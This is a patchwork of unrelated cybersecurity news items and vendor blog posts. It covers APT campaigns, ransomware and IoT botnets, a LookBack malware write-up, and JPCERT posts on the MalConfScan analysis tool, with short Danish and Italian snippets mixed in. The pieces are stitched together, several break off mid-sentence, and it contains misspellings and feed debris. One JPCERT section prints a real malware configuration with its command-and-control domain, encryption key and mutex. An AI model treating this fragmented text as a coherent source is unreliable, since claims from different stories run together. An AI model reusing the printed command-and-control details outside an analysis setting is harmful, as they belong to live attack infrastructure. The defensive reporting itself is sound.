Check Point Research have discovered evidence that the Advanced Persistent Threat (APT) group known as “Naikon” have been persistently targeting national government agencies in the Asia Pacific region since 2015 as part of a cyber-espionage campaign. Naikon APT has been using a new type of Remote Access Trojan (RAT) called “Aria-body” as a backdoor into government networks, targeting ministries of foreign affairs, science, and technology in Australia, Brunei, Indonesia, Myanmar, Philippines, Thailand, and Vietnam. Aria-body infects the network and servers of one target, and then uses the compromised infrastructure to launch new attacks, exploiting the trust between departments and governments to increase the chances of success, according to the Check Point report. Naikon threat actors use several different infection methods to deliver the Aria-body RAT, including malicious emails containing a Rich Text Format (RTF) file weaponized with “RoyalRoad” exploit builder malware, or directly via a legitimate executable file, which serves as a loader. These methods are aimed at personnel within target organizations to be able to use the compromised servers to more effectively infiltrate new agencies. According to reports by Kaspersky, ThreatConnect, and Defense Group Inc. in 2015, Niakon is believed to be Chinese-speaking and associated with China’s People’s Liberation Army (PLA) intelligence operations.Recommendation: This Naikon campaign is highly targeted, therefore, it is likely that actors are impersonating government employees or agencies in spearphishing emails. All employees should be educated on the risk of opening attachments or following links received from unknown or unexpected senders. Anti-spam and antivirus protection should be implemented and kept up-to-date with the latest version to better ensure security.MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment – T1193 | [MITRE ATT&CK] Security Software Discovery – T1063 | [MITRE ATT&CK] System Network Configuration Discovery – T1016Tags: Naikon, APT, China, RAT, Aria-body, RoyalRoad, Malware

Europe’s Largest Private Hospital Operator Fresenius Hit by Ransomware

(published: May 6, 2020)

The private hospital operator Fresenius has been compromised by SNAKE Ransomware. Frentius is the largest European private healthcare provider and has been in high demand for its dialysis service and products used to combat the ongoing COVID-19 pandemic. The SNAKE ransomware is written in Golang and appeared in January 2020, it attempts to identify any processes linked to enterprise management tools and industrial control systems (ICS). This ransomware attack comes after a series of ransomware campaigns targeting health care providers who are attempting to resolve the pandemic.Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS), but as this news shows, new threats are constantly evolving to bypass these protections. Always keep your important files backed up. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Fresenius, SNAKE, Ransomware, COVID-19

Microsoft’s GitHub Account Hacked, Private Repositories Stolen

(published: May 6, 2020)

Threat actors claim to have gained full access to Microsoft’s private GitHub account, and have stolen over 500GB of data in private Microsoft projects. According to files released to Bleeping Computer by Shiny Hunters, the threat actors behind the breach, the event likely occurred March 28th, 2020, and Microsoft has stated that they are aware and investigating the claims behind the leak. Analysts at Bleeping Computer and cyber intelligence firm Under the Breach are of the opinion that the stolen data does not appear to contain sensitive code data for Windows or Office, and is mostly samples, test projects, and other generic items. Under the Breach did tweet concerns that private API keys or passwords could have inadvertently been left in the private repositories, as this has been done by developers in the past.Recommendation: It’s best practice for GitHub and other repository users to not commit personal config files into source control and to use password management tools and multi-factor authentication. While it is currently unknown how Shiny Hunters gained access into Microsoft’s private GitHub account, malicious actors are known to comb the Internet for config files with credentials listed in plain text to gain access to repositories. Avoid committing these files in the future and be sure to discuss best practices with team members.Tags: Microsoft, GitHub, Shiny Hunters

Warning: Citrix ShareFile Flaw Could Let Attackers Steal Corporate Secrets

(published: May 5, 2020)

Three critical vulnerabilities have been identified in Citrix ShareFile customer-managed storage zone controllers. Citrix ShareFile, a file sharing solution for businesses, allows employees to securely access and share proprietary and sensitive business data. According to Citrix, the vulnerabilities (CVE-2020-7473, CVE-2020-8982, CVE-2020-8983) if exploited, would allow an unauthenticated malicious actor access to ShareFile users’ documents and folders. According to Nate Warfield, a Senior Security Program Manager for the Microsoft Security Response Center, a search on Shodan revealed close to 2,800 exposed Citrix ShareFile storage servers. Citrix has released a mitigation tool and updates that include fixes for the three vulnerabilities, which affect ShareFile storage zone Controller 5.9.0, 5.8.0, 5.7.0, 5.5.0, and 5.5.0. Citrix warns that even updated storage zone controllers that were created using vulnerable versions are at risk, and must also run the mitigation tool on primary and secondary storage zone controllers.Recommendation: Threat actors are consistently looking for new ways to conduct malicious activity, therefore, it is crucial that your company has security and patch-maintenance policies in place. The security update should be applied as soon as possible to avoid potential exploitation. Citrix ShareFile customers that manage the zones themselves should ensure they are running a supported version and have run the mitigation tool (available at https://support.citrix.com/article/CTX269341, requires login credentials) if necessary.Tags: CVE-2020-7473, CVE-2020-8982, CVE-2020-8983, Citrix, ShareFile

APT Groups Target Healthcare and Essential Services

(published: May 5, 2020)

The US Department of Homeland Security (DHS) and Cybersecurity and Infrastructure Security Agency (CISA) have issued an alert regarding Advanced Persistent Threat (APT) actors targeting COVID-19 response organizations. The targeted entities include: academia, healthcare, local governments, medical research, and pharmaceutical. The unnamed APT groups are using password spraying attacks, which are automated attacks using a list of passwords. The list of passwords could be a combination of previously compromised credentials or common passwords, among others.Recommendation: It is crucial that your company has password policies in place to avoid repetition across accounts, and mandate a level of password complexity that can resist brute force and password-spray attacks. Educate your employees of the dangers that these styles of attacks impose, and why mitigation must be in place prior to an incident taking place. Threat actors of all levels of sophistication are capable of utilizing brute-force and password-spraying attacks, therefore, it is paramount that all companies take steps to avoid these attacks.Tags: APT, COVID-19, Password spraying

Kaiji: New Chinese Linux Malware Turning to Golang

(published: May 4, 2020)

A new Internet of Things (IoT) botnet called, “Kaiji,” that targets IoT devices and servers with SSH brute-force attacks, according to Intezer researchers. The malware utilizes a custom implant, which was dubbed Kaiji by MalwareMustDie, instead of utilizing some publicly-available ones such as Mirai. Kaiji was built by threat actors in the Golang programming language, which has been increasingly utilized by threat actors. The malware only targets root users while conducting its only method of propagation through SSH brute force, and if Kaiji makes a connection it will launch a bash script to begin the installation process.Recommendation: Botnet malware typically takes advantage of internet-connected devices that have been misconfigured, or do not have security updates applied, however, as Kaiji shows there are Internet of Things (IoT) botnets that conduct brute-force attacks. Any device that connects to the internet must be treated as a security liability, and default usernames and passwords must be disabled. In addition, changing default port configurations can assist in preventing malware that scans for such configuration. Organizations and defenders should be aware of all their internet facing assets and have them under strict monitoring.Tags: Botnet, IoT, Kaiji, SSH brute force

Live Streaming Adult Site Leaves 7 Terabytes of Private Data Exposed

(published: May 4, 2020)

Researchers at SafetyDetectives have identified an exposed database used by the adult streaming website CAM4[.]com which has leaked over seven terabytes of data related to customers. CAM4 is a website used for livestreaming explicit material to adults and researchers were able to find an unsecured ElasticSearch database containing the personally identifiable information (PII) of the website’s customers. The data leaked includes firstname, surname, credit card data, email addresses and sexual orientation. U.S.A, Brazil and Italy were listed as the largest customer base for the platform with 10.88 billion records identified in the leak.Recommendation: Leaks of this sort may cause affected individuals to be at a greater risk of phishing attacks. Actors can use this information to craft custom emails to increase their chances of malicious activity being approved by the recipient. Individuals who have accounts associated with this incident should change their passwords as soon as possible, particularly if passwords for said accounts are the same to other online accounts. Individuals should also regularly monitor their credit reports for suspicious activity or consider an identity theft protection service.MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Exploit Public-Facing Application – T1190Tags: CAM4, Data leak, PII

Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack

(published: May 4, 2020)

Threat actors over the weekend have been targeting the Ghost publishing platform in resource hijacking campaigns to mine cryptocurrency. Ghost is an open-source platform used for publishing and has over two million customers including Mozilla and DuckDuckGo. Threat actors were leveraging the vulnerabilities registered as “CVE-2020-11651” and “CVE-2020-11652”, which allow for remote code execution capabilities on servers in data centers and in the cloud. The exploit comes from Ghost’s usage of SaltStack, which provides the server management infrastructure of the platform.Recommendation: Cryptocurrency malwares are becoming increasingly common amongst threat actors. As this story portrays, it is important that your company institute policies regarding software in use and proper maintenance. New security updates should be applied as soon as possible because they often fix minor bugs and critical vulnerabilities that delay work-flow or can be exploited by malicious actors. Third-party software vendors must ensure that their software is secure frequently to avoid customers falling victim to cyber threats due to their own vulnerabilities.MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Supply Chain Compromise – T1195 | [MITRE ATT&CK] Resource Hijacking – T1496Tags: Ghost, Resource Hijacking, Cryptocurrency mining, CVE-2020-11651, CVE-2020-11652

This section presents an overview of threats related to ransomware activity against municipal institutions, industrial enterprises and critical infrastructure facilities.

WildPressure APT targets industrial systems in the Middle East. ICS attack tools show increasing commodification. TrickMo works against secure banking. Microsoft warns of RCE vulnerability in the way Windows renders fonts. Click fraud malware found in childrens’ apps sold in Google Play. DarkHotel attacks the World Health Organization. Ransomware hits Parisian hospitals and a British biomedical research firm. More COVID-19 phishbait. Ben Yelin from UMD CHHS on Coronavirus detecting cameras, guest is Allan Liska from Recorded Future on security in the time of Coronavirus.

For links to all of today’s stories check our our CyberWire daily news brief:

https://thecyberwire.com/issues/issues2020/March/CyberWire_2020_03_24.html

Support our show

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

A US gas pipeline operator was infected by malware—your questions answered

Enlarge

Tuesday’s news that a ransomware infection shut down a US pipeline operator for two days has generated no shortage of questions, not to mention a near-endless stream of tweets.

Some observers and arm-chair incident responders consider the event to be extremely serious. That’s because the debilitating malware spread from the unnamed company’s IT network—where email, accounting and other business is conducted—to the company’s operational technology, or OT, network, which automatically monitors and controls critical operations carried out by physical equipment that can create catastrophic accidents when things go wrong.

Others said the reaction to the incident was overblown. They noted that, per the advisory issued on Tuesday, the threat actor never obtained the ability to control or manipulate operations, that the plant never lost control of its operations, and that facility engineers deliberately shut down operations in a controlled manner. This latter group also cited evidence that the infection of the plant’s industrial control systems, or ICS, network appeared to be unintentional on the part of the attackers.

Read 30 remaining paragraphs | Comments

index?i=HMk1rAE9v18:uW4u950oNyE:V_sGLiPB index?i=HMk1rAE9v18:uW4u950oNyE:F7zBnMyn index?d=qj6IDK7rITs index?d=yIl2AUoC8zA

Brazilians Targeted by Resurfaced CamuBot Malware (02/06/2020)The CamuBot malware has reemerged after a year-long hiatus to resume targeted attacks on the Brazilian financial industry. IBM X-Force researchers assessed CamuBot and found that it impersonates a security application that banks ask users to install and uses tactics similar to those in use by cybercriminal gangs. The attack begins when someone from the attacker’s side phones the victim and instructs him or her over the phone to browse to an infection page that hosts the CamuBot Trojan.EKANS Ransomware Discovered Targeting ICS Operations (02/04/2020)Multiple vendors have been analyzing an industrial control systems (ICS) ransomware that emerged in December and can halt various processes related to ICS operations. Dragos, MalwareHunterTeam, and SentinelOne have all assessed the EKANS (also called Snake) ransomware. In its research, Dragos connected EKANS to the MEGACORTEX ransomware and also determined that EKANS terminates the named processes on vic

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about Trend Micro Zero Day Initiative’s $1.5 million in awards and other noteworthy milestones in 2019. Also, learn about a crafty malware that makes you retype your passwords so it can steal them for credit card information and other personal data.

Read on:

Four Reasons Your Cloud Security is Keeping You Up at Night

Organizations are migrating to the cloud for speed, agility, scalability, and cost-efficiency – but they have realized that it demands equally powerful security management. As the cloud continues to attract more businesses, security teams are spending sleepless nights securing the infrastructure. We can reduce the number of security issues affecting cloud infrastructure; however, we must first conquer the possible reasons for security vulnerabilities.

Trend Micro and Baker Hughes Collaborate to Help Deliver Protection for Critical Infrastructure

Trend Micro announced this week that it will collaborate with Baker Hughes’ Nexus Controls operational technology (OT) security experts through a strategic framework agreement, signed in late 2019. Together the companies aim to provide comprehensive, industry leading guidance and support for enterprises running critical OT environments.

Malicious Optimizer and Utility Android Apps on Google Play Communicate with Trojans that Install Malware, Perform Mobile Ad Fraud

Trend Micro recently discovered several malicious optimizer, booster and utility apps (detected as AndroidOS_BadBooster.HRX) on Google Play. The apps can access remote ad configuration servers that can be used for malicious purposes, perform mobile ad fraud, and download as many as 3,000 malware variants or malicious payloads on affected devices.

Zero Day Initiative Bug Hunters Rake in $1.5M in 2019

Zero Day Initiative, a division of Trend Micro, awarded more than $1.5 million in cash and prizes to bug-hunters throughout 2019, resulting in 1,035 security vulnerability advisories for the year. Most of those advisories (88 percent) were published in conjunction with a patch from the vendor.

ICS in VUCA: Insights from the World‘s Biggest ICS Security Event – S4

Many sessions at this year’s S4 discussed strengthening leadership. The environment surrounding the ICS community is filled with volatility, uncertainty, complexity and ambiguity (VUCA), and it requires strong leadership to drive changes. In this blog, read about the key takeaways coming out of the world’s leading ICS security event, S4.

This Crafty Malware Makes You Retype Your Passwords So It Can Steal Them

A trojan malware campaign is targeting online banking users around the world with the aim of stealing credit card information, finances and other personal details. Detailed by researchers at Fortinet, the Metamorfo banking trojan has targeted users of over 20 online banks in countries around the world including the US, Canada, Peru, Chile, Spain, Brazil, Ecuador and Mexico.

SORA and UNSTABLE: 2 Mirai Variants Target Video Surveillance Storage Systems

Trend Micro researchers encountered two variants of the notorious internet of things (IoT) malware, Mirai, employing a new propagation method. The two variants, namely SORA (detected as IoT.Linux.MIRAI.DLEU) and UNSTABLE (detected as IoT.Linux.MIRAI.DLEV), gain entry through Rasilient PixelStor5000 video surveillance storage systems by exploiting CVE-2020-6756.

Vulnerability in WhatsApp Desktop Exposed User Files

Facebook has patched a vulnerability in WhatsApp Desktop that could allow an attacker to launch cross-site scripting (XSS) attacks and access files from the victim’s system when paired with WhatsApp for iPhone. The vulnerability was discovered by PerimeterX security researcher Gal Weizman, who found he could bypass WhatsApp’s CSP to execute code on a target system using maliciously crafted messages.

Ryuk Ransomware Infects US Government Contractor

The internal system of U.S. government contractor Electronic Warfare Associates (EWA) was infected with Ryuk ransomware last week, ZDNet reported. EWA is a contractor that supplies electronic equipment and services to the Department of Defense (DOD), the Department of Homeland Security (DHS), and the Department of Justice (DOJ).

New Lemon Duck Malware Campaign Targets IoT, Large Manufacturers

Printers, smart TVs and automated guided vehicles that depend on Windows 7 have become the latest targets for cybercriminals leveraging a “self-spreading” variant of the malware Lemon Duck. In a report released Wednesday by TrapX Security, researchers warn manufacturers dependent on IoT devices are targets in a new global campaign leveraging the malware variant.

New Extortion Campaign Threatens Victims of the 2015 Ashley Madison Breach

A new extortion campaign is targeting victims of the Ashley Madison data breach that happened five years ago, Vade Secure reports. Avid Life Media — the company behind the site — was hacked in 2015 by a group known as Impact Team. The actors behind this new campaign tell victims that they will publicize proof of their profile as well as other “embarrassing” activities and demand bitcoins as payment. 

Emotet Uses Coronavirus Scare in Latest Campaign, Targets Japan

Threat actors behind the Emotet malware used the novel coronavirus (2019-nCoV) scare as a hook for their spam email campaign against targets in Japan. IBM X-Force reported that the coronavirus spam emails were disguised as official notifications sent by a disability welfare provider and public health centers. The email content warns recipients about the rapid spread of the virus and instructs them to download an attached notice that allegedly contains preventive measures.

Researchers Use Smart Light Bulbs to Infiltrate Networks

Researchers successfully infiltrated networks through a vulnerability in Philips Hue light bulbs. The CVE-2020-6007 vulnerability, which involves the Zigbee communication protocol, can be abused to remotely install malicious firmware in smart light bulbs and spread malware to other internet-of-things (IoT) devices.

What was your biggest takeaway from the S4 ICS security conference this year? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: ZDI Bug Hunters Rake in $1.5M in 2019 and Metamorfo Trojan Malware Campaign Targets Online Banking Users appeared first on .

Researchers simulated a real-looking “Industrial prototyping” organization with fake employees, PLCs, and websites to study the types of cyber-attacks that commonly on such networks. The elaborately fake organization’s website and the network worked on a highly advanced interactive “honeypot” network that worked extensively on attracting the attention of potential hackers.The plan was to create such a legitimate-looking network that no one could even doubt it’s being phony and to accumulate serious information related to cyber-threats and attacks to study and analyze them. Behind researching these threats and attack mechanisms the motive was to dig out the threats that the “Industrial control system” (ICS) sector faces today. Per sources, the sham company specifically let some ports of its network be susceptible to attack and Voila! It got hit with the most cliché of attacks that any IT network faces, including, Ransomware, Malware, Remote Access Trojans (RAT), Crypto-jacking, Online fraud and the “botnet-sty

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Prooftpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to be from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Even fraudulently using the NCEES logo, the emails included Word documents embedded with malicious micros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that drops three different Privacy Enhanced Mail (PEM) files when executed. Certutil.exe is then dropped to decode PEM files, which are later restored to their true extensions using essentuti.exe. The files then impersonate the name of an open-source binary used by common tools like Notepad++, which contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once executed, LookBack can send and receive numerous commands, such as Find files, Read files, Delete files, Write to files, Start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it’s important to have multiple controls in place to detect the activities related. This includes continuous security awareness training for employees and personnel to help them better identify fake and malicious emails. But beyond SPAM filters and firewalls, Nozomi Networks Labs recommends the use of both anomaly detection technologies to identify unusual behavior, and the use of traditional threat detection capabilities to provide additional context around suspicious actors related to known threats.

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

REGISTER FOR THE WEBINAR
How to Detect LookBack Malware

Tuesday, August 16th, 2019
9:00 AM PDT

REGISTER NOW

Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various types of information which provides a lot of clues in incident handling, for example communication details with other hosts and techniques to perpetuates itself. This time, we will introduce a plugin “MalConfScan with Cuckoo” that automatically extracts malware configuration using MalConfScan (See the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, which is an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs on Cuckoo, enabling automatic extraction of malware configuration . Figure 1 shows Cuckoo’s behaviour where “MalConfScan with Cuckoo” is installed.

Figure 1:Behaviour of MalConfScan with CuckooFigure 1:Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs malware on the host machine to extract configuration. When malware is registered on Cuckoo and executed on the host machine, a memory image will be dumped, from which MalConfScan extracts configuration of known malware. Extracted configuration will then be shown in a report. Please see the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan/

Instruction and report example

First, upload malware on Cuckoo that has “MalConfScan with Cuckoo” installed by using Web GUI or commands. An official document from Cuckoo [1] provides details about the upload procedures. When the upload and analysis is completed, a report will be provided as in Figure 2.

Figure 2:Report of MalConfScan with CuckooFigure 2:Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

“malconfscan”: {
“data”: [
{
“malconf”: [
[
{“Server1”: “diamond.ninth.biz”},
{“Server2”: “diamond.ninth.biz”},
{“Server3”: “diamond.ninth.biz”},
{“Server4”: “diamond.ninth.biz”},
{“Port”: “443”},
{“Mode”: “TCP and HTTP”},
{“ID”: “2017-11-28-MACRO”},
{“Mutex”: “Q34894iq”},
{“Key”: “usotsuki”},
{“UserAgent”: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)”},
{“Proxy server”: “”},
{“Proxy username”: “”},
{“Proxy password”: “”}
] ],
“vad_base_addr”: “0x04521984”,
“process_name”: “iexplore.exe”,
“process_id”: “2248”,
“malware_name”: “Himawari”,
“size”: “0x00815104”
}
],
},

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
   https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe

In closing

This plugin enables extracting configuration of known malware from sandbox. Even in case where malware has anti-VM or anti-sandbox function, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Blackhat USA 2019, and we look forward to having active discussion and feedback from analysts.

Tomoaki Tani(Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis https://cuckoo.sh/docs/usage/submit.html

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese] https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019 https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware – they share most part of the code and there is a slight difference in configuration such as C&C servers. This indicates that malware analysis is almost complete as long as the configuration is extracted from malware.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. In most cases, malware analysis begins with unpacking the malware to extract configuration. MalConfScan extracts configuration from unpacked executable files loaded on the memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes from a memory image and list the string that it refers to
malconfscan

Figure 1 is an example of malconfscan execution. First, a malware-injected process name (Name), the process ID (PID) and the name of the detected malware (Malware Name) are displayed. Malware configuration (Config info) is also displayed.

malconfscan execution result 1Figure 1:malconfscan execution result (Detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

malconfscan execution result 2Figure 2:malconfscan execution result (Detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.

malstrscan

malstrscan detects Process Hollowing on the memory and lists the strings that the process refers to. Although malware configuration is usually encoded, malware decodes it when referring to the information, and this is sometimes left on the memory. This function can pick up such remaining configuration. Figure 3 is an example of malstrscan execution.

malstrscan execution resultsFigure 3:malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
Malware
Ursnif
HawkEye Keylogger
Emotet
Lokibot
Smoke Loader
Bebloh
Poison Ivy
AZORult
CobaltStrike
NanoCore RAT
NetWire
AgentTesla
PlugX
FormBook
RedLeaves
NodeRAT
TSCookie
njRAT
TSC_Loader
TrickBot
xxmm
Remcos
Datper
QuasarRAT
Ramnit

Listen over de identificerede malware-varianter i juni måned viser en tilbagevenden af WannaCry- og Tinba-aktiviteter.

Tendensen er stadig at de ti varianter, der identificeres oftest, står for mere end 60 procent af de samlede malware-identifikationer.

Fordelingen over de hyppigst optrædende malware-navne ser således ud for juni 2019:

Sprog
Dansk

Keywords: malwareLæs mere om Top-10 over malware i juni

I ricercatori di sicurezza del team Unit 42 di Palo Alto Networks hanno scoperto il malware per macOS CookieMiner, progettato per “rubare” i cookie associati a siti Web per lo scambio di criptovalute.

There are two types of companies: Those who have been hacked, and those who don’t yet know they have been hacked1

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. Traditional network security solutions being used in combating the current cyber-crimewave have only increased the complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices(human controlled and otherwise) as part of ransomware campaigns, steal sensitive data, or other criminal activities.

It’s far more important to keep an eye on what’s traveling out of the network….Today, malicious actors aren’t interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.2

We should always remind ourselves of the statement above made by John Kindervag and add to our focus, ways to prevent any data exfiltration to unauthorized sources in our network. Companies have typically leveraged endpoint solutions in addition to other network elements to protect against malware used for that purpose. However, in combating the cyber-criminals of today, companies need to embrace a defense-in-depth security strategy where all network layers used in accessing data should be secure and this includes the DNS layer. DNS is an often overlooked layer for security and yet, is integral to network functionality. It’s the protocol we use to locate resources on a network. We use it to access our favorite websites, whether news or social media. We use it to access the printers or storage devices, when accessing the security cameras in the data centers and even to send emails. It’s also used by unsuspecting victims to access phishing websites from where malware is downloaded. It is also used by malware to locate control servers on internet. These servers could serve as destinations of data stolen (also using DNS protocol) from digital assets inside companies. These servers could also be used to download keys used to encrypt digital assets as part of ransomware activities.

And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.

malware.png

These are drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway solution that is really about advanced threat protection in the cloud for all your users everywhere and using that as your safe onramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply need to direct their recursive DNS traffic to Enterprise Threat Protector global servers where all requested domains are checked against Akamai’s real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine if they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real-time using multiple advanced malware-detection engines.

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.

I marts 2018 blev projektet URLhaus lanceret af abuse.ch, der er en non-profit cyber-sikkerhedsorganisation, baseret i Schweiz.

Formålet med URLhaus er at indsamle URL’er fra sider, der distribuerer malware, hvilket efter ti måneders arbejde har resulteret i, at samarbejdet nu har lukket ikke mindre end 100.000 sider.

256 sikkerhedsforskere, der er spredt over hele verden, rapporterer hver dag til URLhaus om malware-sider, og de hjælper på den måde internetbrugerne mod malware-kampagner.

Sprog
Dansk

Keywords: malwarenon-profitLæs mere om Non-profit samarbejde har nu lukket 100.000 malware-sider

“A First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth” https://t.co/ggSw5PG4Bh #cryptomining #malware

I ricercatori di sicurezza di Malwarebytes hanno individuato un nuovo malware per macOS, battezzato DarthMiner, che combina le funzionalità della backdoor EmPyre e del cryptominer XMRig.

Using removable media like USB drives in the manufacturing automation sector is a fact of life where folks from operators Read More.

